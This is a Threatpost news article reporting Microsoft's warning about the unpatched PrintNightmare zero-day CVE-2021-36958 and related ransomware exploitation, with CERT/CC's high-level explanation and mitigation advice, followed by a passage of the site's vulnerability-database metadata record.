Microsoft Warns: Another Unpatched PrintNightmare Zero-Day

2021-08-12T13:19:50

Description

One day after dropping its scheduled August Patch Tuesday update, Microsoft issued a warning about yet another unpatched privilege escalation/remote code-execution (RCE) vulnerability in the Windows Print Spooler that can be filed under the [PrintNightmare umbrella](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>). The news comes amid plenty of PrintNightmare exploitation. Researchers from CrowdStrike warned in a [Wednesday report](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) that the operators of the Magniber ransomware quickly weaponized CVE-2021-34527 to attack users in South Korea, with attacks dating back to at least July 13. And Cisco Talos [said Thursday](<https://blog.talosintelligence.com/2021/08/vice-society-ransomware-printnightmare.html>) that the Vice Society gang was seen using CVE-2021-1675 and CVE-2021-34527 to spread laterally across a victim’s network as part of a recent ransomware attack. “In technology, almost nothing ages gracefully,” Chris Clements, vice president of solutions architecture and Cerberus security officer at Cerberus Sentinel, told Threatpost. “The Print Spooler in Windows is proving that rule. It’s likely that the code has changed little in the past decades and likely still bears a striking resemblance to source code that was made public in previous Windows leaks. I’ve heard it said that ransomware gangs might also be referred to as ‘technical debt collectors,’ which would be funnier if the people suffering most from these vulnerabilities weren’t Microsoft’s customers.” [![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>) The fresh zero-day bug, tracked as CVE-2021-36958, carries a CVSS vulnerability-severity scale rating of 7.3, meaning that it’s rated as “important.” Microsoft said that it allows for a local attack vector requiring user interaction, but that the attack complexity is low, with few privileges required. “A remote code-execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,” the computing giant explained in its [Wednesday advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>). “An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change or delete data; or create new accounts with full user rights.” The CERT Coordination Center actually flagged the issue in mid-July, when it warned that a [working exploit](<https://twitter.com/gentilkiwi/status/1416429860566847490>) was available. That proof-of-concept (PoC), issued by Mimikatz creator Benjamin Delpy, comes complete with a video. > Hey guys, I reported the vulnerability in Dec'20 but haven't disclosed details at MSRC's request. It looks like they acknowledged it today due to the recent events with print spooler. > > — Victor Mata (@offenseindepth) [August 11, 2021](<https://twitter.com/offenseindepth/status/1425574625384206339?ref_src=twsrc%5Etfw>) On Thursday, CERT/CC issued more details on the issue, explaining that it arises from an oversight in signature requirements around the “Point and Print” capability, which allows users without administrative privileges to install printer drivers that execute with SYSTEM privileges via the Print Spooler service. While Microsoft requires that printers installable via Point are either signed by a WHQL release signature or by a trusted certificate, Windows printer drivers can specify queue-specific files that are associated with the use of the device, which leaves a loophole for malicious actors. “For example, a shared printer can specify a CopyFiles directive for arbitrary files,” according to the CERT/CC [advisory](<https://www.kb.cert.org/vuls/id/131152>). “These files, which may be copied over alongside the digital-signature-enforced printer driver files, are not covered by any signature requirement. Furthermore, these files can be used to overwrite any of the signature-verified files that were placed on a system during printer driver install. This can allow for local privilege escalation to SYSTEM on a vulnerable system.” Microsoft credited Victor Mata of FusionX at Accenture Security with originally reporting the issue, which Mata said occurred back in December 2020: > Hey guys, I reported the vulnerability in Dec’20 but haven’t disclosed details at MSRC’s request. It looks like they acknowledged it today due to the recent events with print spooler. > > — Victor Mata (@offenseindepth) [August 11, 2021](<https://twitter.com/offenseindepth/status/1425574625384206339?ref_src=twsrc%5Etfw>) So far, Microsoft hasn’t seen any attacks in the wild using the bug, but it noted that exploitation is “more likely.” With a working exploit in circulation, that seems a fair assessment. ## **Print Spooler-Palooza and the PrintNightmare ** Delpy characterized this latest zero-day as being part of the string of Print Spooler bugs collectively known as PrintNightmare. The bad dream started in early July, when a PoC exploit for a bug tracked as CVE-2021-1675 was [dropped on GitHub](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>). The flaw was originally addressed in [June’s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) from Microsoft as a minor elevation-of-privilege vulnerability, but the PoC showed that it’s actually a critical Windows security vulnerability that can be used for RCE. That prompted Microsoft to issue a different CVE number – in this case, CVE-2021-34527 – to designate the RCE variant, and it prompted [an emergency partial patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>), too. “This vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),” the company wrote in the advisory at the time. “The attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.” Both bugs – which are really just variants of a single issue – are collectively known as PrintNightmare. The PrintNightmare umbrella expanded a bit later in July, when yet another, [similar bug was disclosed](<https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/>), tracked as CVE-2021-34481. It remained unpatched until it was finally addressed with [an update](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>) issued alongside the [August Patch Tuesday updates](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>) (which itself detailed three additional Print Spooler vulnerabilities, one critical). ## **How to Protect Systems from Print Spooler Attacks** As mentioned, there’s no patch yet for the bug, but users can protect themselves by simply stopping and disabling the Print Spooler service: ![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/12073406/Windows-Zero-Day-Workaround.png) Source: Microsoft. CERT/CC also said that since public exploits for Print Spooler attacks use the SMB file-sharing service for remote connectivity to a malicious shared printer, blocking outbound connections to SMB resources would thwart some attacks by blocking malicious SMB printers that are hosted outside of the network. “However, Microsoft indicates that printers can be shared via the Web Point-and-Print Protocol, which may allow installation of arbitrary printer drivers without relying on SMB traffic,” according to CERT/CC. “Also, an attacker local to your network would be able to share a printer via SMB, which would be unaffected by any outbound SMB traffic rules.” In its update advisory for CVE-2021-34481, Microsoft also detailed how to amend the default Point and Print functionality, which prevents non-administrator users from installing or updating printer drivers remotely and which could help mitigate the latest zero-day. ![Threatpost Webinar Series ](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/27093135/threatpost-webinar-300x51.jpg)Worried about where the next attack is coming from? We’ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.

{"id": "THREATPOST:ADA9E95C8FD42722E783C74443148525", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Microsoft Warns: Another Unpatched PrintNightmare Zero-Day", "description": "One day after dropping its scheduled August Patch Tuesday update, Microsoft issued a warning about yet another unpatched privilege escalation/remote code-execution (RCE) vulnerability in the Windows Print Spooler that can be filed under the [PrintNightmare umbrella](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>).\n\nThe news comes amid plenty of PrintNightmare exploitation. Researchers from CrowdStrike warned in a [Wednesday report](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) that the operators of the Magniber ransomware quickly weaponized CVE-2021-34527 to attack users in South Korea, with attacks dating back to at least July 13. And Cisco Talos [said Thursday](<https://blog.talosintelligence.com/2021/08/vice-society-ransomware-printnightmare.html>) that the Vice Society gang was seen using CVE-2021-1675 and CVE-2021-34527 to spread laterally across a victim\u2019s network as part of a recent ransomware attack.\n\n\u201cIn technology, almost nothing ages gracefully,\u201d Chris Clements, vice president of solutions architecture and Cerberus security officer at Cerberus Sentinel, told Threatpost. \u201cThe Print Spooler in Windows is proving that rule. It\u2019s likely that the code has changed little in the past decades and likely still bears a striking resemblance to source code that was made public in previous Windows leaks. I\u2019ve heard it said that ransomware gangs might also be referred to as \u2018technical debt collectors,\u2019 which would be funnier if the people suffering most from these vulnerabilities weren\u2019t Microsoft\u2019s customers.\u201d\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe fresh zero-day bug, tracked as CVE-2021-36958, carries a CVSS vulnerability-severity scale rating of 7.3, meaning that it\u2019s rated as \u201cimportant.\u201d Microsoft said that it allows for a local attack vector requiring user interaction, but that the attack complexity is low, with few privileges required.\n\n\u201cA remote code-execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\u201d the computing giant explained in its [Wednesday advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>). \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change or delete data; or create new accounts with full user rights.\u201d\n\nThe CERT Coordination Center actually flagged the issue in mid-July, when it warned that a [working exploit](<https://twitter.com/gentilkiwi/status/1416429860566847490>) was available. That proof-of-concept (PoC), issued by Mimikatz creator Benjamin Delpy, comes complete with a video.\n\n> Hey guys, I reported the vulnerability in Dec'20 but haven't disclosed details at MSRC's request. It looks like they acknowledged it today due to the recent events with print spooler.\n> \n> \u2014 Victor Mata (@offenseindepth) [August 11, 2021](<https://twitter.com/offenseindepth/status/1425574625384206339?ref_src=twsrc%5Etfw>)\n\nOn Thursday, CERT/CC issued more details on the issue, explaining that it arises from an oversight in signature requirements around the \u201cPoint and Print\u201d capability, which allows users without administrative privileges to install printer drivers that execute with SYSTEM privileges via the Print Spooler service.\n\nWhile Microsoft requires that printers installable via Point are either signed by a WHQL release signature or by a trusted certificate, Windows printer drivers can specify queue-specific files that are associated with the use of the device, which leaves a loophole for malicious actors.\n\n\u201cFor example, a shared printer can specify a CopyFiles directive for arbitrary files,\u201d according to the CERT/CC [advisory](<https://www.kb.cert.org/vuls/id/131152>). \u201cThese files, which may be copied over alongside the digital-signature-enforced printer driver files, are not covered by any signature requirement. Furthermore, these files can be used to overwrite any of the signature-verified files that were placed on a system during printer driver install. This can allow for local privilege escalation to SYSTEM on a vulnerable system.\u201d\n\nMicrosoft credited Victor Mata of FusionX at Accenture Security with originally reporting the issue, which Mata said occurred back in December 2020:\n\n> Hey guys, I reported the vulnerability in Dec\u201920 but haven\u2019t disclosed details at MSRC\u2019s request. It looks like they acknowledged it today due to the recent events with print spooler.\n> \n> \u2014 Victor Mata (@offenseindepth) [August 11, 2021](<https://twitter.com/offenseindepth/status/1425574625384206339?ref_src=twsrc%5Etfw>)\n\nSo far, Microsoft hasn\u2019t seen any attacks in the wild using the bug, but it noted that exploitation is \u201cmore likely.\u201d With a working exploit in circulation, that seems a fair assessment.\n\n## **Print Spooler-Palooza and the PrintNightmare **\n\nDelpy characterized this latest zero-day as being part of the string of Print Spooler bugs collectively known as PrintNightmare.\n\nThe bad dream started in early July, when a PoC exploit for a bug tracked as CVE-2021-1675 was [dropped on GitHub](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>). The flaw was originally addressed in [June\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) from Microsoft as a minor elevation-of-privilege vulnerability, but the PoC showed that it\u2019s actually a critical Windows security vulnerability that can be used for RCE. That prompted Microsoft to issue a different CVE number \u2013 in this case, CVE-2021-34527 \u2013 to designate the RCE variant, and it prompted [an emergency partial patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>), too.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote in the advisory at the time. \u201cThe attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\nBoth bugs \u2013 which are really just variants of a single issue \u2013 are collectively known as PrintNightmare. The PrintNightmare umbrella expanded a bit later in July, when yet another, [similar bug was disclosed](<https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/>), tracked as CVE-2021-34481. It remained unpatched until it was finally addressed with [an update](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>) issued alongside the [August Patch Tuesday updates](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>) (which itself detailed three additional Print Spooler vulnerabilities, one critical).\n\n## **How to Protect Systems from Print Spooler Attacks**\n\nAs mentioned, there\u2019s no patch yet for the bug, but users can protect themselves by simply stopping and disabling the Print Spooler service:\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/12073406/Windows-Zero-Day-Workaround.png)\n\nSource: Microsoft.\n\nCERT/CC also said that since public exploits for Print Spooler attacks use the SMB file-sharing service for remote connectivity to a malicious shared printer, blocking outbound connections to SMB resources would thwart some attacks by blocking malicious SMB printers that are hosted outside of the network.\n\n\u201cHowever, Microsoft indicates that printers can be shared via the Web Point-and-Print Protocol, which may allow installation of arbitrary printer drivers without relying on SMB traffic,\u201d according to CERT/CC. \u201cAlso, an attacker local to your network would be able to share a printer via SMB, which would be unaffected by any outbound SMB traffic rules.\u201d\n\nIn its update advisory for CVE-2021-34481, Microsoft also detailed how to amend the default Point and Print functionality, which prevents non-administrator users from installing or updating printer drivers remotely and which could help mitigate the latest zero-day.\n\n![Threatpost Webinar Series ](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/27093135/threatpost-webinar-300x51.jpg)Worried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "published": "2021-08-12T13:19:50", "modified": "2021-08-12T13:19:50", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/", "reporter": "Tara Seals", "references": ["https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/", "https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/", "https://blog.talosintelligence.com/2021/08/vice-society-ransomware-printnightmare.html", "https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958", "https://twitter.com/gentilkiwi/status/1416429860566847490", "https://twitter.com/offenseindepth/status/1425574625384206339?ref_src=twsrc%5Etfw", "https://www.kb.cert.org/vuls/id/131152", "https://twitter.com/offenseindepth/status/1425574625384206339?ref_src=twsrc%5Etfw", "https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/", "https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/", "https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/", "https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/", "https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872", "https://threatpost.com/exploited-windows-zero-day-patch/168539/", "https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar", "https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar"], "cvelist": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34527", "CVE-2021-36958"], "immutableFields": [], "lastseen": "2021-08-13T19:49:18", "viewCount": 240, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917", "AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9"]}, {"type": "avleonov", "idList": ["AVLEONOV:30285D85FDB40C8D55F6A24D9D446ECF", "AVLEONOV:36BA0DE03DB6F8D0C96B6861C9A07473", "AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE"]}, {"type": "cert", "idList": ["VU:131152", "VU:383432"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0465"]}, {"type": "cisa", "idList": ["CISA:367C27124C09604830E0725F5F3123F7", "CISA:4F4185688CEB9B9416A98FE75E7AFE02", "CISA:6C836D217FB0329B2D68AD71789D1BB0", "CISA:91DA945EA20AF1A221FDE02A2D9CE315"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2021-1675", "CISA-KEV-CVE-2021-34527"]}, {"type": "cnvd", "idList": ["CNVD-2021-91637", "CNVD-2022-10026"]}, {"type": "cve", "idList": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34527", "CVE-2021-36936", "CVE-2021-36947", "CVE-2021-36958"]}, {"type": "githubexploit", "idList": ["0263BC36-BEB1-519B-965B-52D9E6AB116F", "0BB19334-D311-5464-B40B-7B27A0AD8825", "14B62DA4-FBC4-5B89-AB9F-9F8E3505AFAD", "17B904FB-7F3D-54F1-B1B5-069C67184EE5", "1883DF48-6A75-5743-AC93-56292D93A794", "19D705F8-AE98-5DD9-BC4E-CDC0497FB840", "1E42289A-77F8-55A2-B85E-83CAA00CE951", "21F83D93-118D-50C7-A5C0-B2069237666E", "272E1B9F-32B1-5E4A-A0A9-44AC16DA37DB", "2A12C3BB-2A75-5B33-AE9B-348DB656AC81", "3399B834-8492-5C0C-AA14-7F120BA37AF6", "3D6A6F0D-C38E-5819-A3A7-817A49825CBE", "3DC96731-93EE-5FF0-9AC3-C472059DC1AF", "436B5B97-EF58-5F05-B611-815DDEF67B8A", "4749D0AA-8CE9-53E3-8EFF-E818FDC61B24", "4A3F2A96-B727-5EF1-B1C1-FE041BA02E28", "4E279194-AC85-5607-A943-AC23EADADEF7", "5AE71695-062E-5DBA-9A16-69BD0C7D1384", "5E52E412-B5BA-54D6-92C1-F70C151A8199", "645DABC8-04DA-51BF-A20F-68F611D2D666", "64AAF745-D50D-575C-B3FF-A09072475502", "7C3B421E-ED99-5C5F-B2BA-4418307C0EBF", "8542D571-7253-5609-BC52-CBCB5F40929A", "86F04665-0984-596F-945A-3CA176A53057", "895FF449-0383-5007-9352-FABB3E8BD54C", "8EDE916A-F04B-59F0-A88D-13DEF969DC00", "98CA9A39-577D-51F2-B8B9-B20E80D94173", "98CEA984-CF02-58F6-91D5-967F8D36F94A", "9A318669-DAF8-50FF-A5DF-E390E0386254", "9CC224C9-907A-5219-8EFD-A94F15DE0ADD", "A66D9AD7-B29D-5C48-B247-D8ACFCAE9BC7", "AAD37CB5-B2C3-5908-B0D3-052CF47F6D25", "AD904001-0962-5826-AD78-253E0FB3B7B7", "AF2B8EF5-A739-53BD-8B8D-04A8C441268C", "B03B4134-B4C9-5B2D-BA55-EEEA540389F4", "B26A6295-2D2D-508F-B94C-38B6944F8A1F", "B3985759-BBD2-5956-860D-E6361564C262", "B8D9E2C0-202B-5806-88D2-B0E797582618", "BB9DA286-F06B-5A55-B344-1196B32F3C2B", "BDFBDA81-0DEB-5523-B538-F23C3B524986", "C6AE3BFC-9BBB-5327-8845-C88ABB6FEE40", "C841D92F-11E1-5077-AE70-CA2FEF0BC96E", "CD2BFDFF-9EBC-5C8F-83EC-62381CD9BCD5", "D089579B-4420-5AD5-999F-45063D972E66", "D21805C7-F04C-57A9-8A40-84CEEB7695BC", "DF28DCE7-CCFF-5653-81BA-719525BE09AD", "E235B3DF-990F-5508-9496-90462B45125D", "E601A788-C87D-5DD7-98BA-A68C2FEDE978", "E7D3FB75-54DE-5CD8-83D6-438BFC7CFA74", "E82ECEEF-07B8-5340-BAC6-FA5B0E964772", "EA908F34-E282-522D-A0C0-E6D40C0621CD", "F1347375-6380-5145-9881-486B76875649", "F1B229EB-2178-53B9-839E-BA0B916376A2", "F1C20A6A-5492-50FE-BB94-25D35B1459EC", "F92F972D-7309-5D0B-BCC2-054883AE83E9", "FBC9D472-5E25-508D-AB6E-B3197FCFED2D", "FF761088-559C-5E71-A5CD-196D4E4571B8", "FF81AF93-C247-5242-810E-AA1201C16776", "FFBC2747-5957-57B1-9DD9-AB2BAFCB7BD6"]}, {"type": "hivepro", "idList": ["HIVEPRO:1C413EFAC97AED19F9E35574668008F9", "HIVEPRO:8D09682ECAC92A6EA4B81D42F45F0233", "HIVEPRO:8DA601C83DB9C139357327C06B06CB36", "HIVEPRO:E7E537280075DE5C0B002F1AF44BE1C5"]}, {"type": "ics", "idList": ["AA22-074A", "AA22-117A", "AA22-249A", "AA22-249A-0"]}, {"type": "kaspersky", "idList": ["KLA12198", "KLA12202", "KLA12213", "KLA12214", "KLA12231", "KLA12246", "KLA12281", "KLA12282"]}, {"type": "kitploit", "idList": ["KITPLOIT:1358590931647264988", "KITPLOIT:232707789076746523"]}, {"type": "krebs", "idList": ["KREBS:3CC49021549439F95A2EDEB2029CF54E", "KREBS:831FD0B726B800B2995A68BA50BD8BE3", "KREBS:AE87E964E683A56CFE4E51E96F3530AD"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:7F8FC685D6EFDE8FC4909FDA86D496A5", "MALWAREBYTES:9F3181D8BD5EF0E44A305AF69898B9E0", "MALWAREBYTES:DA59FECA8327C8353EA012EA1B957C7E", "MALWAREBYTES:DB34937B6474073D9444648D34438225"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-DCERPC-CVE_2021_1675_PRINTNIGHTMARE-"]}, {"type": "mscve", "idList": ["MS:CVE-2021-1675", "MS:CVE-2021-34481", "MS:CVE-2021-34527", "MS:CVE-2021-36936", "MS:CVE-2021-36947", "MS:CVE-2021-36958"]}, {"type": "mskb", "idList": ["KB5004945", "KB5004946", "KB5004947", "KB5004948", "KB5004950", "KB5004951", "KB5004953", "KB5004954", "KB5004955", "KB5004956", "KB5004958", "KB5004959", "KB5004960", "KB5005030", "KB5005031", "KB5005033", "KB5005040", "KB5005043", "KB5005076", "KB5005088", "KB5005089", "KB5005090", "KB5005094", "KB5005095", "KB5005099", "KB5005106", "KB5005606", "KB5005607", "KB5005613", "KB5005615", "KB5005618", "KB5005623", "KB5005627", "KB5005633"]}, {"type": "msrc", "idList": ["MSRC:236F052536DCDE6A90F408B759E221BC", "MSRC:239E65C8BEB88185329D9990C80B10DF", "MSRC:8DDE6C6C2CBC080233B7C0F929E83062", "MSRC:90189138D61770FDBFA4D6BFCF043C7F", "MSRC:CB3C49E52425E7C1B0CFB151C6D488A4", "MSRC:D3EB0B723121A9028F60C06787605F29"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_AUG_5005030.NASL", "SMB_NT_MS21_AUG_5005031.NASL", "SMB_NT_MS21_AUG_5005043.NASL", "SMB_NT_MS21_AUG_5005089.NASL", "SMB_NT_MS21_AUG_5005094.NASL", "SMB_NT_MS21_AUG_5005095.NASL", "SMB_NT_MS21_AUG_5005106.NASL", "SMB_NT_MS21_JUL_5004945.NASL", "SMB_NT_MS21_JUL_5004946.NASL", "SMB_NT_MS21_JUL_5004947.NASL", "SMB_NT_MS21_JUL_5004948.NASL", "SMB_NT_MS21_JUL_5004950.NASL", "SMB_NT_MS21_JUL_5004951.NASL", "SMB_NT_MS21_JUL_5004958.NASL", "SMB_NT_MS21_JUL_5004959.NASL", "SMB_NT_MS21_JUL_5004960.NASL", "SMB_NT_MS21_JUL_CVE-2021-34527_REG_CHECK.NASL", "SMB_NT_MS21_JUN_5003635.NASL", "SMB_NT_MS21_JUN_5003637.NASL", "SMB_NT_MS21_JUN_5003638.NASL", "SMB_NT_MS21_JUN_5003646.NASL", "SMB_NT_MS21_JUN_5003681.NASL", "SMB_NT_MS21_JUN_5003687.NASL", "SMB_NT_MS21_JUN_5003694.NASL", "SMB_NT_MS21_JUN_5003695.NASL", "SMB_NT_MS21_JUN_5003697.NASL", "SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_5005623.NASL", "SMB_NT_MS21_SEP_5005633.NASL", "WINDOWS_RESTRICTDRIVERINSTALLATIONTOADMINISTRATORS_REG_CHECK.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:167261"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950", "QUALYSBLOG:12BC089A56EB28CFD168EC09B070733D", "QUALYSBLOG:23EF75126B24C22C999DAD4D7A2E9DF5", "QUALYSBLOG:485C0D608A0A8288FF38D618D185D2A2", "QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911", "QUALYSBLOG:5A5094DBFA525D07EBC3EBA036CDF81A", "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:A0F20902D80081B44813D92C6DCCDAAF", "QUALYSBLOG:A730164ABD0AA0A58D62EAFAB48628AD", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:45A121567763FF457DE6E50439C2605A", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:57AB78EC625B6F8060F1E6BD668BDD0C", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:8DADA7B6B3B1BA6ED3D6EDBA37A79204", "RAPID7BLOG:D1C9D661B6FC47BE44B8FBB6E1D49AD5", "RAPID7BLOG:E44F025D612AC4EA5DF9F2B56FF8680C", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630"]}, {"type": "securelist", "idList": ["SECURELIST:0C07A61E6D92865F5B58728A60866991", "SECURELIST:830DE5B1B5EBB6AEE4B12EF66AD749F9", "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "seebug", "idList": ["SSV:99276"]}, {"type": "talosblog", "idList": ["TALOSBLOG:44F665C3D577FC52EF671E9C0CB1750F", "TALOSBLOG:8CDF0A62E30713225D10811E0E977C1D"]}, {"type": "thn", "idList": ["THN:10A732F6ED612DC7431BDC9A3CEC3A29", "THN:3F83D0C001F2A9046C61A56F5ABE7695", "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "THN:6428957E9DED493169A2E63839F98667", "THN:849B821D3503018DA38FAFFBC34DAEBB", "THN:9CE630030E0F3E3041E633E498244C8D", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:A52CF43B8B04C0A2F8413E17698F9308", "THN:C2D8045AAD8E4BA5A9168782138B6D52", "THN:CAFA6C5C5A34365636215CFD7679FD50", "THN:CF5E93184467C7B8F56A517CE724ABCF", "THN:EDD5C9F076596EB9D13D36268BDBFAD1", "THN:F35E41E26872B23A7F620C6D8F7E2334", "THN:F601EBBE359B3547B8E79F0217562FEF"]}, {"type": "threatpost", "idList": ["THREATPOST:500777B41EEA368E3AC2A6AED65C4A25", "THREATPOST:6F7C157D4D3EB409080D90F02185E728", "THREATPOST:827A7E3B49365A0E49A11A05A5A29192", "THREATPOST:8D4EA8B0593FD44763915E703BC9AB72", "THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:A8242348917526090B7A1B23735D5C6C", 